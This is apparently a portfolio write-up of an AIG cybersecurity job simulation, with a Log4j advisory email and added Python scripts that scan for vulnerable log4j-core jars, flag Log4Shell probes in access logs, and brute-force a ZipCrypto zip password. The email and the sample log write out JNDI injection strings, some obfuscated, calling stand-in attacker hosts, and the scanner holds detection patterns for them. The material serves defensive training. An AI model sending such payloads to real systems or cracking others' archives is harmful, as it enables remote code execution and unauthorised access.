AIG Insurance
Completed a job simulation involving the role of a cybersecurity generalist, specializing in cybersecurity.
Completed a cybersecurity threat analysis simulation for the Cyber Defense Unit, staying updated on CISA publications.
Researched and understood reported vulnerabilities, showcasing analytical skills in cybersecurity.
Drafted a clear and concise email to guide teams on vulnerability remediation.
Utilized Python skills to write a script for ethical hacking, avoiding ransom payments by brute-forcing decryption keys.
Communication
Cybersecurity
Data Analysis
Design Thinking
Problem Solving
Python
Research
Security Advisory
Security Engineering
Software Development
Solution Architecture
Strategy
Vulnerability Triage
Background information
You are an Information Security Analyst in the Cyber & Information Security Team.
A common task and responsibility of information security analysts is to stay on top of emerging vulnerabilities to make sure that the company can remediate them before an attacker can exploit them.
In this task, you will be asked to review some recent publications from the Cybersecurity & Infrastructure Security Agency (CISA). CISA is the US federal agency whose goal is to reduce the nation's exposure to cyber security threats and risks.
After reviewing the publications, you will then need to draft an email to inform the relevant infrastructure owner at AIG of the seriousness of the vulnerability that has been reported.
Background information
Your advisory email in the last task was great. It provided context to the affected teams on what the vulnerability was, and how to remediate it.
Unfortunately, an attacker was able to exploit the vulnerability on the affected server and began installing ransomware. Luckily, the Incident Detection & Response team was able to stop the ransomware before it finished installing, so it only managed to encrypt one zip file.
Internally, the Chief Information Security Officer does not want to pay the ransom, because there isn't any guarantee that the decryption key will be provided or that the attackers won't strike again in the future.
Instead, we would like you to brute-force the decryption key. Based on the attacker's sloppiness, we don't expect this to be a complicated key: they used copy-pasted payloads and immediately deployed ransomware instead of moving laterally across the network.
Task 1 - Responding to a zero-day vulnerability
CISA has recently published the following two advisories:
The first advisory (Log4j) outlines a serious vulnerability in Apache Log4j, one of the world's most widely used logging libraries.
The second advisory explores how ransomware has been increasing and is becoming professionalized - a concern for a large company like AIG.
Your task is to respond to the Apache Log4j zero-day vulnerability that was publicly disclosed by advising affected teams of the vulnerability.
First, research the vulnerability using the CISA Advisory resources provided above as a starting point.
Next, analyze the Infrastructure List below to find out which infrastructure may be affected by the vulnerability, and which team owns it.
| Product Team | Product Name | Team Lead | Services Installed |
| --- | --- | --- | --- |
| IT | Workstation Management System | Jane Doe (tech@email.com) | OpenSSH, dnsmasq, lighttpd |
| Product Development | Product Development Staging Environment | John Doe (product@email.com) | Dovecot pop3d, Apache httpd, Log4j, Dovecot imapd, MiniServ |
| Marketing | Marketing Analytics Server | Joe Schmoe (marketing@email.com) | Microsoft ftpd, Indy httpd, Microsoft Windows RPC, Microsoft Windows netbios-ssn, Microsoft Windows Server 2008 R2 - 2012 microsoft-ds |
| HR | Human Resource Information System | Joe Bloggs (hr@email.com) | OpenSSH, Apache httpd, rpcbind 2-4 |

Log4j appears only on the Product Development Staging Environment, so the advisory goes to its team lead, John Doe.
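The list above identifies the Product Development Staging Environment as the only host running Log4j. What it does not tell you is which log4j-core build is installed there, and that determines whether the host is exploitable and whether an update or an interim mitigation is needed. The following Python script is added here as an example (it is not part of the simulation or of any AIG tooling): it walks a directory tree for log4j-core jars, reads the version from the jar manifest, reports whether the JndiLookup class is present, and applies Apache's documented interim mitigation of deleting that class from the jar. The fixed-version thresholds (2.17.1, 2.12.4 for the Java 7 line, 2.3.2 for the Java 6 line) are Apache's; the directory layout and jar contents are constructed fixtures, and the scanner assumes jars sit directly on disk (jars nested inside a WAR are not unpacked).

```python
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
_VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def is_fixed(version: str) -> Optional[bool]:
    """True when a log4j-core 2.x version carries the complete Log4Shell fix set:
    2.17.1+ (Java 8+), 2.12.4+ (Java 7 line) or 2.3.2+ (Java 6 line). None if not 2.x."""
    m = _VERSION.match(version)
    if not m or int(m.group(1)) != 2:
        return None  # 1.x is end-of-life and needs replacing rather than patching
    minor, patch = int(m.group(2)), int(m.group(3))
    if minor == 3:
        return patch >= 2
    if minor == 12:
        return patch >= 4
    return (minor, patch) >= (17, 1)


def jar_version(path: str) -> str:
    """Implementation-Version from the manifest, falling back to the file name."""
    with zipfile.ZipFile(path) as jar:
        manifest = (jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
                    if "META-INF/MANIFEST.MF" in jar.namelist() else "")
    m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
    if not m:
        m = re.search(r"log4j-core-(\d+\.\d+\.\d+)", os.path.basename(path))
    return m.group(1) if m else "unknown"


def assess_jar(path: str) -> Dict[str, object]:
    version = jar_version(path)
    with zipfile.ZipFile(path) as jar:
        present = JNDI_LOOKUP in jar.namelist()
    return {"path": path, "version": version, "jndi_lookup_present": present,
            "needs_update": is_fixed(version) is not True}


def scan(root: str) -> List[Dict[str, object]]:
    """Walk a tree for log4j-core jars (jars nested inside WARs are out of scope here)."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core-") and name.endswith(".jar"):
                found.append(assess_jar(os.path.join(dirpath, name)))
    return found


def strip_jndi_lookup(path: str) -> bool:
    """Apache's interim mitigation: rewrite the jar without JndiLookup.class."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP:
                    dst.writestr(info, src.read(info.filename))
    os.replace(tmp, path)
    return True


def make_fake_jar(path: str, version: str) -> None:
    """Constructed fixture: only the two entries the scanner inspects."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only


def demo() -> Tuple[List[Dict[str, object]], Dict[str, object]]:
    """Scan a throwaway tree, mitigate the vulnerable jar, and re-assess it."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "app", "WEB-INF", "lib")
        os.makedirs(lib)
        vulnerable = os.path.join(lib, "log4j-core-2.14.1.jar")
        make_fake_jar(vulnerable, "2.14.1")
        make_fake_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1")
        before = sorted(scan(root), key=lambda f: str(f["version"]))
        strip_jndi_lookup(vulnerable)
        after = assess_jar(vulnerable)
        for finding in before + [after]:
            finding["path"] = os.path.relpath(str(finding["path"]), root)
        return before, after
```

Note that 2.15.0 and 2.16.0 close CVE-2021-44228 but not the later CVE-2021-45105 (denial of service) and CVE-2021-44832 (code execution through a modified configuration), so the scanner still reports them as needing an update; removing JndiLookup.class only buys time against the JNDI lookup itself.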
From: AIG Cyber & Information Security Team
To: John Doe <product@email.com>
Subject: Security Advisory concerning Ransomware Exploitation of Log4j Vulnerabilities

Hello John,

The AIG Cyber & Information Security Team would like to inform you of critical vulnerabilities in Apache Log4j, as outlined by CISA, that affect the Product Development Staging Environment (which runs Log4j) and may expose our infrastructure to ransomware attacks.

Risk/Impact: Ransomware actors are actively exploiting vulnerabilities in Log4j (CVE-2021-44228, known as Log4Shell, and the follow-on CVE-2021-45046) to gain unauthorized access to systems. Successful exploitation gives an unauthenticated attacker control of the affected host, leading to data encryption, operational disruption and potential data exfiltration, with a high risk of downtime, financial loss and reputational damage.

Method of Exploitation: An attacker places a specially crafted string, a JNDI lookup of the form ${jndi:ldap://attacker-host/payload}, in any input the application logs, for example an HTTP header or form field. Vulnerable Log4j versions resolve the lookup, fetch and execute attacker-controlled code, and the resulting remote code execution (RCE) lets ransomware actors deliver payloads or gain administrative control of the environment.

Remediation:
Immediately update every instance of Log4j 2 to a fixed release: 2.17.1 or later (2.12.4 on Java 7, 2.3.2 on Java 6). If patching cannot happen straight away, remove the JndiLookup class from the log4j-core jar as an interim mitigation.
Use available web application firewall (WAF) rules to block malicious requests, bearing in mind that WAF signatures are bypassed by obfuscated payloads and are not a substitute for patching.
Monitor for indicators of compromise (IoCs) related to Log4j exploitation: ${jndi: strings in request logs and unexpected outbound LDAP, RMI or DNS connections from the server.
Implement network segmentation, restrict internet-facing services and limit outbound connections from the server to mitigate exposure.
Please ensure these steps are actioned promptly to reduce the risk of ransomware. For any questions or further guidance, don't hesitate to reach out to us.
Kind regards,
AIG Cyber & Information Security Team
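The monitoring step in the advisory above is easiest to act on with a concrete rule. Below, as an added example that is not part of the original submission, is a Python check that runs over web-server access log lines and flags Log4Shell probes, including the commonly observed obfuscations (${lower:}/${upper:} re-casing, ${::-x} default-value nesting, and URL encoding). The log lines, IP addresses and callback hosts are constructed; the normalizer covers only those tricks, so it is a triage aid rather than a complete detector, and outbound LDAP, RMI or DNS connections from the server remain the more reliable signal.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample lines (Apache combined log format) mixing benign traffic with the
# common Log4Shell probe shapes: plain, case-lookup obfuscated, default-value
# obfuscated, and URL-encoded in the query string. 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2021:10:01:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.9 - - [12/Dec/2021:10:01:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"
10.0.0.9 - - [12/Dec/2021:10:01:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/a}"
10.0.0.9 - - [12/Dec/2021:10:01:15 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
10.0.0.6 - - [12/Dec/2021:10:01:16 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# ${lower:x} / ${upper:x} evaluate to x re-cased; ${anything:-x} evaluates to the default x.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s\"]*)", re.IGNORECASE)


def normalize(text: str) -> str:
    """Strip URL encoding and collapse nested lookups until the text stops changing."""
    text = unquote(unquote(text))  # single or double encoded
    while True:
        collapsed = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        collapsed = _DEFAULT_VALUE.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            return text
        text = collapsed


def find_log4shell_attempts(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, JNDI scheme, callback target) for each line carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), match.group(2)))
    return hits


if __name__ == "__main__":
    for number, scheme, target in find_log4shell_attempts(SAMPLE_LOG.splitlines()):
        print(f"line {number}: jndi:{scheme} -> {target}")
```

The callback target is worth extracting rather than just flagging the line: it is the host to block at the egress firewall and to search for in proxy and DNS logs to tell a scan from a successful exploitation.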
Task 2 - (Technical) Bypassing ransomware
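The brief in the second Background information section asks for a brute force of the key protecting the one zip file the ransomware managed to encrypt. The Python script below is an added example, not the simulation's own script or answer. It assumes the file is a password-protected ZIP using traditional ZipCrypto (the scheme Python's zipfile module can open with a password), and it builds its own encrypted archive in memory, with a constructed plaintext and passwords, so that it runs offline; in a real run you would load the recovered archive from disk and feed candidates from a wordlist file instead of the inline list.

```python
import io
import itertools
import string
import struct
import zipfile
import zlib
from typing import Dict, Iterable, Optional

# ZipCrypto (traditional PKWARE) encryption, the mirror image of the decrypter in
# Python's zipfile module. It exists here only to build an encrypted fixture offline.
_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


class ZipCryptoEncrypter:
    def __init__(self, password: bytes) -> None:
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, b: int) -> None:
        self.k0 = (self.k0 >> 8) ^ _CRC_TABLE[(self.k0 ^ b) & 0xFF]
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = (self.k2 >> 8) ^ _CRC_TABLE[(self.k2 ^ (self.k1 >> 24)) & 0xFF]

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            k = self.k2 | 2
            out.append(p ^ (((k * (k ^ 1)) >> 8) & 0xFF))
            self._update(p)  # the key stream advances on the plaintext byte
        return bytes(out)


def build_encrypted_zip(name: str, data: bytes, password: bytes) -> bytes:
    """One stored entry protected with ZipCrypto; readable by zipfile with the right pwd."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 filler bytes + the CRC's high byte, which readers
    # use as a quick wrong-password check before decrypting anything else.
    body = ZipCryptoEncrypter(password).encrypt(bytes(11) + bytes([crc >> 24]) + data)
    fname = name.encode()
    flags, method, mtime, mdate = 0x0001, zipfile.ZIP_STORED, 0, 0x21  # bit 0 = encrypted; 1980-01-01
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, mtime, mdate,
                        crc, len(body), len(data), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method, mtime, mdate,
                          crc, len(body), len(data), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local) + len(body), 0)
    return local + body + central + eocd


def crack_zip(zip_bytes: bytes, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate that decrypts the archive's first entry, else None."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = zf.namelist()[0]
        for pwd in candidates:
            try:
                # read() decrypts the whole entry and verifies its CRC-32, so a wrong password
                # that slips past the 1-in-256 header check (RuntimeError otherwise) is still
                # rejected, with BadZipFile.
                zf.read(name, pwd=pwd)
                return pwd
            except (RuntimeError, zipfile.BadZipFile):
                continue
    return None


# Constructed stand-in for a wordlist file read one candidate per line.
WORDLIST = [b"123456", b"letmein", b"qwerty", b"password", b"Password1", b"hunter2"]


def numeric_pins(length: int) -> Iterable[bytes]:
    """Every digit string of the given length, 0000..9999 for length 4."""
    for digits in itertools.product(string.digits, repeat=length):
        yield "".join(digits).encode()


def demo() -> Dict[str, object]:
    secret = b"claims-export-q4.csv: CONFIDENTIAL\n"  # constructed plaintext
    by_word = build_encrypted_zip("claims.csv", secret, b"Password1")
    by_pin = build_encrypted_zip("claims.csv", secret, b"1337")
    hit = crack_zip(by_word, WORDLIST)
    with zipfile.ZipFile(io.BytesIO(by_word)) as zf:
        plaintext = zf.read("claims.csv", pwd=hit) if hit else None
    return {"wordlist_hit": hit, "plaintext": plaintext,
            "pin_hit": crack_zip(by_pin, numeric_pins(4)),
            "miss": crack_zip(by_word, [b"wrong", b"guess"])}
```

Two points worth knowing before relying on this. zipfile rejects most wrong passwords from a single header check byte, so each attempt is cheap, but one wrong password in 256 passes that check and is only caught by the CRC-32 verification that read() performs, which is why the loop catches BadZipFile as well as RuntimeError. And the premise only holds for a sloppy attacker: ZipCrypto is weak enough to have dedicated known-plaintext attacks of its own, while ransomware that generates a random per-victim AES key cannot be brute-forced this way at all, and the sample should be preserved for the incident responders before anything is tried against it.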